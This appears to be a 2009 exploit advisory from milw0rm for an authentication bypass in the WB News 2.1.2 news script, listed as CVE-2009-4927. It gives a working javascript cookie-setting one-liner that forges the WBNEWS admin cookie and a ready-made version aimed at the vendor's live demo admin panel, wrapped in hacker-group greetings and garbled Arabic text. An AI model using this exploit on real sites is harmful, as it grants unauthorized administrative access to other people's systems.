WB News 2.1.2 - Insecure Cookie Handling

EKU-ID: 16304	CVE: OSVDB-53822;CVE-2009-4927	OSVDB-ID:
Author: ThE g0bL!N	Published: 2009-04-20	Verified:
Download:

Rating

☆☆☆☆☆

[~] ----------------------------Ø¨Ø³Ù… Ø§Ù„Ù„Ù‡ Ø§Ù„Ø±ØÙ…Ù† Ø§Ù„Ø±ØÙŠÙ…-----------------------------

 [~]Download: http://www.webmobo.com/downloads/

 [~]Software: wb news 2.1.2
 [~]author: ThE g0bL!N


 [~] Home: WWW.h4ckf0ru.com
Chi3arona houa :  Serra7 merra7 , koulchi mderra7>>>>
             Aflawa Kamikaz Wa4rin Fi kol Bla4s
[~] -----------------------------{ Iam MuSlIm}------------------------------

wb news 2.1.2 Insecure Cookie Handling Vulnerability
---------------------------------------
exploit:
-------
javascript:document.cookie="WBNEWS=[id];path=/";
demo
----
http://demo.webmobo.com/news/admin/
exploit for demo
----------------
javascript:document.cookie="WBNEWS=1;path=/";

[~]--------------------------------------------------------------------------------

 [~] Greetz tO:
  [~]
  [~] Dos-Dz TeaM - Snakes TeaM - Team Sobh4n ALLAH -His0k4-
  [~]
  [~]
  [~]
  [~]

 [~]--------------------------------------------------------------------------------

# milw0rm.com [2009-04-20]